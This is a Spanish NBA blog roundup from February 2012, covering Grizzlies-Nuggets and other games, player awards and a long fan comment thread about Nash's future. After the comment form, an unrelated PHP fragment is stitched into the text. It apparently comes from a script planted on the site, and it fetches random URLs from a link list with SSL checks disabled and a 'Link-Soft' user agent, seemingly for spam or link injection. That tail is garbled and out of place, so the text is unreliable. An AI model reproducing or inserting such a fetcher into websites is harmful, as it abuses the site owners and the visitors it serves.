La Crónica: Los Grizzlies se imponen a los Nuggets

01 de February de 2012 por TheDeerHunter

Jornada algo gris para lo que estamos acostumbrados.

Por encima del resto destacamos la victoria de los Grizzlies rompiendo la buena racha de Denver, con prórroga incluida (97-100). Les costó horrores a pesar de la completa actuación de todos en general y de Marc y Gay en particular. Los Nuggets estuvieron más precisos en el tiro, a pesar de los lastres en Gallinari y Rudy. André Miller y Al Harrington impusieron galones y experiencia, teniendo en sus manos la victoria antes de llegar al tiempo extra. En los momentos clave dieron un paso adelante Allen y Mayo, ayuda extra que no surgió en Denver y que acabó por desnivelar la balanza.

Los Celtics a punto estuvieron de tirar una ventaja de 22 puntos. Entre Pierce y un Allen especialmente generoso tenían la situación controlada hasta el último cuarto. En él la dupla Varejao-Irving más los aciertos puntuales de Jamison rozaron la machada (93-90). A pesar de la “vendeta” sigue preocupando el déficit reboteador de los verdes. Varejao por momentos parecía Wilt Chamberlain. Los problemas bajo tableros también estuvieron a punto de costarle un disgusto a los Warriors ante los Kings. Con 15 rebotes de déficit y Tyreke rozando el triple doble, Brandon Rush, Lee y Wright se multiplicaron para sostener a su equipo, en un flojo partido de Curry y Ellis (90-93).

Volvió Melo y volvió convenciendo. Por fin un gran partido colectivo de los Knicks, muy compensado además. Melo 25 puntos, pero sin lanzar demasiado y mirando mucho a sus compañeros. Eso es liderar. De todas formas los Pistons no es rival como para sacar conclusiones (86-113).

En el resto, los Pacers ganaron a los Nets a pesar de un partido inmenso de Deron (99-106) y Lakers y Hawks aplastaron respectivamente a Bobcats (73-106) y Raptors (100-77) respectivamente.

PREMIOS

MVP: Joe Johnson necesito 3 cuartos para cuajar su mejor partido de la temporada. 30 puntos en 30 minutos con una excepcional serie de 13 canastas en 18 intentos. Los Hawks necesitan a su escolta titular a este nivel si quieren sobrevivir a la baja de Al Horford.

Rookie: Jugaban Kyrie Irving y Kemba Walker y el duelo indirecto podemos decir que quedó en tablas. El de los Cavs anotó 21 puntos y repartió 6 asistencias mientras que el de los Bobcats consiguió 12 puntos, 6 rebotes y 6 asistencias. Atentos a Andy Goudelock, 12 puntos, 3 rebotes y 3 asistencias.

Sorpresa: Anthony Morrow sacó su fusil y se fue hasta los 28 puntos. En el mismo partido Paul George consiguió la mejor marca anotadora de su carrera: 24 puntos.

Decepción: Mal partido del italiano Danilo Gallinari que tan buenas sensaciones está dejando esta temporada. 1 de 10 en tiros de campo y tan solo 8 puntos.

Esfuerzo en vano: La mayoría de las mejores actuaciones del día han sido para jugadores que han perdidos sus encuentros. Deron Williams anotó 34 puntos y repartió 7 asistencias, Anderson Varejao consiguió un 20-20 y Tyreke Evans se quedó a una asistencia del triple doble (22-10-9). Todos se quedaron con la miel en los labios.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

36 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    Gran victoria de los Grizzlies ante unos sufridores Nugets. Qué merito tiene el señor George Karl, siempre consigue que sus jugadores vayan a muerte con él. Sin duda, hace honor cada noche a sus +1000 victorias. He visto el resumen y realmente la clave es OJ Mayo en los momentos finales. Le deberían renovar, no sé a qué están esperando, aunque no sé si el plazo de renovaciones ha terminado ya.

      Citar

  2. Esteban dice:
    #2

    Sancho, menphis ya esta en impuesto de lujo este año con mayo cobramdo 5 kilos, el proximo aÑo aumentan sus grandes contratos, zbo, conley y marc, no creo q puedan darse el lujo de pagasrle 7 kilos a mayo, q creo q varios equipos se lo ofreceran o sino mas, le vendria de perlas a pacers y al mega proyecto de los nets, mas aun si no tiene problemas con ser sexto hombre

    Aqui ya he hablado sobre mi devocion por morrow, si en verdad los nets quiewren regalarlo podria ayudar enormemente a lakers o clippers q tienen jugadores determinantes y necesitan un hombre de rol capaz de entrar y anotar su triples, ojala q lo fiche un equipo candidato, si los nets quieren liberar salarios, morrow por foye o morrow por blake, los 3 cobran lo mismo y los dos angelinos terminan contratos

      Citar

  3. max dice:
    #3

    Sancho, la clave (aparte de OJ) también ha sido la intensidad defensiva de Tony Allen. Como defiende este tio, parece que le vaya la vida en ello!!

      Citar

  4. Sancho88 dice:
    #4

    y también que Harrington entra como un torito sin mirar a canasta. Le ponen muchas chapas. Si te fijas, Allen se queda parado con la mano arriba como esperándole, xd. Y efectivamente, en vez de doblar el balón fuera entra a lo loco…

      Citar

  5. Sancho88 dice:
    #5

    Hombre, pues lógicamente a Mayo le tendrían que pagar bastante más de lo que cobra ahora. Yo no sé qué decirte, quizás les vendría bien desprenderse de Conley y quedarse con Mayo. Le podrían dar la batuta a Selby y a Pargo, que tienen mucha capacidad de mejora (sobre todo defensiva). Ya te digo, que yo me quedaría con ese pavo a toda costa

      Citar

  6. Esteban dice:
    #6

    Sancho88:
    Hombre, pues lógicamente a Mayo le tendrían que pagar bastante más de lo que cobra ahora. Yo no sé qué decirte, quizás les vendría bien desprenderse de Conley y quedarse con Mayo. Le podrían dar la batuta a Selby y a Pargo, que tienen mucha capacidad de mejora (sobre todo defensiva). Ya te digo, que yo me quedaría con ese pavo a toda costa

    sancho, creo que comparto este comentario, ahora el problema es a quien le vendes el contrato de conley, hay enorme cantidad de bases con mas talento por unos dos o 3 millones mas y sin tantos años de contrato, recuerda q conley tiene contrato hasta la modica fecha de 2016 cobrando un promedio de 8 millones al año, creo q es mucho

      Citar

  7. Sancho88 dice:
    #7

    a los Lakers!!

      Citar

  8. melo15 dice:
    #8

    O a los magic, o a los Suns o a los Hoenets

      Citar

  9. Esteban dice:
    #9

    no los veo a LAL sumando un jugador con 5 años de contrato…

    los de melo podrian tener mas sentido, aunque tamb tengo mis dudas si arrancan una reconstruccion

      Citar

  10. Esteban dice:
    #10

    me van a decir q me estoy volviendo loco por los clippers, pero no entiendo que esperan para fichar un perimetral mas, keith bogans acaba de fichar por los nets, como defensor y tirador fiable, prefiero a bogans por sobre foye y gomes

    espero q hagan algo y pronto

      Citar

  11. Jose Luis dice:
    #11

    Chicos, ¿habéis visto el porcentaje de triples de Brandon Rush? 59,3% de acierto, que burrada!

      Citar

  12. Sancho88 dice:
    #12

    Es el efecto Warrior. Te vas allí y tiras mínimo un 10-15% mejor, xd

      Citar

  13. Alfredo dice:
    #13

    Tengo una inquietud muy grande y espero que alguien me pueda ayudar: DONDE C… VA A IR NASH AL AÑO QUE VIENE?? Está claro que hay equipos aspirantes al anillo donde el puesto de base lo tienen más que cubierto con un all-star (Bulls, Thunder, Clippers, Celtics,….. Nets si fichan a Howard y renueva Deron), otros aspirantes que le podrían ofrecer el mínimo (Lakers, Heat) y un bloque de equipos que les daría un salto de calidad y podrían aspirar a todo y le pagarían 6-8 millones (Atlanta, Indiana, Philadelphia, Portland, Dallas y hasta Memphis). ¿Qué hará? Visto el impacto de Paul (un top 3 en su puesto) en Clippers, doy automáticamente al equipo que lo contrate candidato al próximo anillo. Se merece la pasta, y se merece el anillo

      Citar

  14. Esteban dice:
    #14

    Por mas bueno que sea Nash, dificilmente pueda sacar campeon a atlanta, 76s, indiana o menphis el proximo año, sin dudas nash jugara por el minimo en lakers o miami a ver si puede lograr su anillo

      Citar

  15. nach dice:
    #15

    Tanto Miami como LAL tienen el problema de que Kobe y LeBron acaparan muchísimo balón, y Nash necesita ese balón para desarrollar su juego. Para mí el equipo sería Miami siempre y cuando LeBron cambiara esa forma de jugar, Nash sería una amenaza exterior que abriría las defensas y Bosh podría dar un salto cualitativo jugando pick&roll con Steve.

      Citar

  16. simon dice:
    #16

    firme por quien firme Nash el año que viene, yo seré el mayor fan de ese equipo y desearé con todas mis fuerzas que gane el anillo ese equipo. Nash es el jugador que mas pena me daria que se fuera sin uno… ojo, incluso si es por Miami por el que firma jejejeje. Aunque Miami este año ya no me cae tan mal. pesqué a Lebron en las Hoops y eso hace cambiar de opinion hacia el y su equipo a cualquiera jejejeje.

      Citar

  17. busky23 dice:
    #17

    Hoy 30 puntos 10 asistencias con 13/16 en el tiro…Incombustible…Steve Nash,grande entre los grandes …

      Citar

  18. rumbero dice:
    #18

    Hoy se ha convertido en el máximo asistente de la historia de los Suns por delante de Kevin Johnson. Crack!
    Yo también quiero que este jugón se retire con un anillo, pero estaría bien que no fuera a cualquier precio. Que lo consiga desplegando todo su talento y no con un papel secundario. Aunque no lo gane la gente no olvidará lo que ha aportado este tio al basket (al igual que J. Williams, que se le recordará más por sus maravillas en los Kings que su anillo con Miami). Que se vaya a un equipo candidato, pero donde tenga que exprimirse al 100% para lograrlo. Disfrutaremos todos más 😀

      Citar

  19. Alfredo dice:
    #19

    Totalmente de acuerdo con rumbero. Personalmente, me gustaría a Lakers si siguiese Pau porque formarían un bonito dúo sacapuntas y se hincharían a ganar partidos. Traspaso Bynum y MWP por un banquillo competente ya!!! Amnistía a Walton ya!!!

      Citar

  20. melo15 dice:
    #20

    Pues no le veo la gracia a ganar un anillo en un equipo, en el que no eres el jugador franquicia, ya me entendeis, no mola es como lo de Karl Malone a los Lakers, ademas normalmente se lesionan, siendo tan mayores

      Citar

  21. TheDeerHunter dice:
    #21

    melo15:
    Pues no le veo la gracia a ganar un anillo en un equipo, en el que no eres el jugador franquicia, ya me entendeis, no mola es como lo de Karl Malone a los Lakers, ademas normalmente se lesionan, siendo tan mayores

    Pues casualmente Malone jamás ganó un anillo en Lakers (ni en ningún otro sitio)
    Yo sí le veo la gracia a ganar anillos, de la forma y manera que sea. A mí eso del “jugador franquicia” me parece una de las estupideces más grandes que se han inventado en la historia del baloncesto.
    A ver si el pobre Chris Paul esta noche lo habrá pasado mal por no ser el jugador franquicia de los Clippers. Se le nota jodidísimo oyes…

      Citar

  22. Txusma dice:
    #22

    TheDeerHunter: Pues casualmente Malone jamás ganó un anillo en Lakers (ni en ningún otro sitio)
    Yo sí le veo la gracia a ganar anillos, de la forma y manera que sea. A mí eso del “jugador franquicia” me parece una de las estupideces más grandes que se han inventado en la historia del baloncesto.
    A ver si el pobre Chris Paul esta noche lo habrá pasado mal por no ser el jugador franquicia de los Clippers. Se le nota jodidísimo oyes…

    Lo que cuenta es que juguen un papel importante. Garnett se fue a los Celtics a ganar al menos un anillo y lo consiguió. No creo que se arrepienta nunca.
    Otro caso es el de, por ejemplo, Mirch Richmond al que creo no le hizo mucha ilusión ese anillo ganando con los Lakers en 2002. Solo jugó 4 minutos en todos los Playoffs…

      Citar

  23. Melo15 dice:
    #23

    Eso es a lo que me referia, para esta todo el año lesionado, y para ser un reserva y jugar 5 minutos, pues te quedas en tu equipo, y encima muchos se lesionan.
    PD: ya sabia que malone no gano el aniñli, lo vanaron los PIstons.

      Citar

  24. Txusma dice:
    #24

    Melo15:
    Eso es a lo que me referia, para esta todo el año lesionado, y para ser un reserva y jugar 5 minutos, pues te quedas en tu equipo, y encima muchos se lesionan.
    PD: ya sabia que malone no gano el aniñli, lo vanaron los PIstons.

    Hombre, pero Nash tiene todo el derecho del mundo a intentarlo, no? Y vamos, que no habrá ahora mismo 3 bases en la liga mejores que Nash, ni los habrá el año que viene, visto lo visto.

      Citar

  25. Sancho88 dice:
    #25

    Y Dios en el 98, también se lo ganó. xd

      Citar

  26. simon dice:
    #26

    Pero es que Nash vaya donde vaya va a ser importante, o es que te crees que el equipo al que vaya va a permitirse tener al aun top 3 en bases ofensivos de la liga en el banco mucho tiempo?? os imaginais por ejemplo en Miami, a lo mejor sumaria 5 o 8 puntos por partido, pero se iría facil por encima de las 12-14 dia si dia también… Vaya donde vaya va a ser importante.
    En eso que has dicho Melo de la forma de ganar los anillos estoy de acuerdo, pero es que ese no va a ser la forma de ganarlo de Nash.

      Citar

  27. Rompe dice:
    #27

    Si nos alegramos nosotros de que ganen nuestros equipos aún ni oliendo el pabellón, ¿cómo se sentirá alguien que ha compartido banquillo, aunque haya jugado 4 minutos? Seguro que fatal…

      Citar

  28. Ru dice:
    #28

    Los destinos de Nash..sólo el sabe que es lo que quiere,puede elegir ganar un anillo con un clima benévolo como el de Arizona(Miami),puede reunirse con su viejo entrenador(Knicks si D’Antoni sigue ahí,que no lo creo) o puede retirarse plácidamente en casa idolatrado por su público(Toronto Raptors) o en algún equipo de California donde jugó en los años univeristarios o puede apuntalar el megaproyecto retornando a un Dallas que ficha a Howard…A saber,pero lo que está claro es que novias no le van a faltar.

      Citar

  29. simon dice:
    #29

    Knicks descartado, ni son contenders, ni lo van a ser el año que viene. Lo entendería si D´antony hubiera sido un entrenador al que debiera estar agradecido pq lo hizo como jugador etc… pero el que tendría que agredecer algo sería D´antony a Nash, pq si sus destinos no se hubieran cruzado me parece a mi que este no sería entrenador jefe ni de un equipo de D´League. Raptors descartado, al menos para el año que viene ( veria mas factible que se quedara en Phoenix ). Yo creo que si Dallas consigue a Howard, Nash irà de cabeza para allá. conoce la franquicia, sería un candidato y allí es querido ( como en todos sitios ).
    Para mi sería este orden:
    1. Dallas
    2. Miami
    3. Lakers
    4. Phoenix
    5. Knicks
    6. Raptors. ( estos ultimos los pongo por poner )

      Citar

  30. melo15 dice:
    #30

    No a este nivel no sera un jugador vulgar, pero es muy mayor ya, y cada vez cuesta mas moverse no? A lo mejor se lesiona y juega desquiciado toda la temporada, nose, yo prefiero retirarme ante mi aficion con aplausos que pasar temporadas lesionandote

      Citar

  31. rumbero dice:
    #31

    No tendrá las piernas de un chaval,pero a sus 37años debe ser el tio que más se cuida de toda la NBA. Además, no ha dado síntomas de bajón aun (esta madrugada 30-10 con la gorra). Es un auténtico fuera de serie este tio.
    Por eso decía antes que me gustaria verlo en un candidato pero con un papel protagonista…porque le queda gasolina y calidad pese a la edad. Unos Dallas con Howard suenan muy bien

      Citar

  32. Denise dice:
    #32

    El destino de Nash es el siguiente: Orlando Magic, lo que supondría la renovación de Howard.

    Nelson + Ryan Anderson por Steve Nash.

      Citar

  33. Denise dice:
    #33

    melo15:
    No a este nivel no sera un jugador vulgar, pero es muy mayor ya, y cada vez cuesta mas moverse no? A lo mejor se lesiona y juega desquiciado toda la temporada, nose, yo prefiero retirarme ante mi aficion con aplausos que pasar temporadas lesionandote

    Melo, estoy de acuerdo, pero de momento Nash aun no se arrastra por las pistas como McGrady o Grant Hill. Por no hablar el Penny Hardaway que jugó hace poco con los Heat, o el Iverson de los Grizzlies.

    A día de hoy sólo Paul, Rondo y Deron superan a Nash, y el canadiense todavia es capaz de hacerle un traje a todos los bases, incluso a éstos tres.

    Por ejemplo, a tu querido Kemba se lo come con patatas fritas.

      Citar

  34. Denise dice:
    #34

    He estado tirando de datos y estadísticas, y…algunas veces se critican los partidos a 70 puntos de la Euroliga y la ACB, pero ojo, sólo 3 equipos (Oklahoma, Miami y Denver superan los 100 puntos de media). Por tanto no creo que haya mucha diferencia con Europa.
    – Si por regla general, un equipo europeo promedia unos 77 puntos, jugando 8 minutos más como en la NBA, se iría a unos 92 puntos más o menos. Estaría parejo las cifras anotadoras con la NBA

      Citar

  35. Denise dice:
    #35

    Denise:
    He estado tirando de datos y estadísticas, y…algunas veces se critican los partidos a 70 puntos de la Euroliga y la ACB, pero ojo, sólo 3 equipos (Oklahoma, Miami y Denver superan los 100 puntos de media). Por tanto no creo que haya mucha diferencia con Europa.
    – Si por regla general, un equipo europeo promedia unos 77 puntos, jugando 8 minutos más como en la NBA, se iría a unos 92 puntos más o menos. Estaría parejo las cifras anotadoras con la NBA

    De hecho, los Celtics están promediando 90 puntos en 48 minutos por los 83 del Madrid en 40”

      Citar

  36. Sancho88 dice:
    #36

    Ya Denise, pero esta temporada es especial, no lo extrapolemos al resto de temporadas, en las que se superan e largo esos 100 puntos. El problema de Europa es conceptual, mientras el problema en Estaods Unidos es de carga de partidos. Los equipos se han ido haciendo directamente en los partidos, casi no les ha dado tiempo a entrenar, etc.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>